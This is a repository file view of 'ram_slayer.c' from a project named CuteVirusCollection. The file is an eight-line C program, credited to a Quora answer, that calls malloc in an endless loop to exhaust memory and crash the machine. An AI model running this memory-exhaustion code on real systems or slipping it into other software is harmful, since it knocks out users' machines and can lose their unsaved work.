Files
CuteVirusCollection/ram_slayer.c
Minhas Kamal 307fc558fb ram slayer
2016-12-14 00:11:59 +06:00

8 lines
211 B
C

// Source: https://www.quora.com/What-is-your-smallest-piece-of-code-that-can-crash-the-computer/answer/George-Gonzalez-5?srid=u2HNX
// Usees up all of RAM.
int main(){
while(malloc(1000));
return 0;
}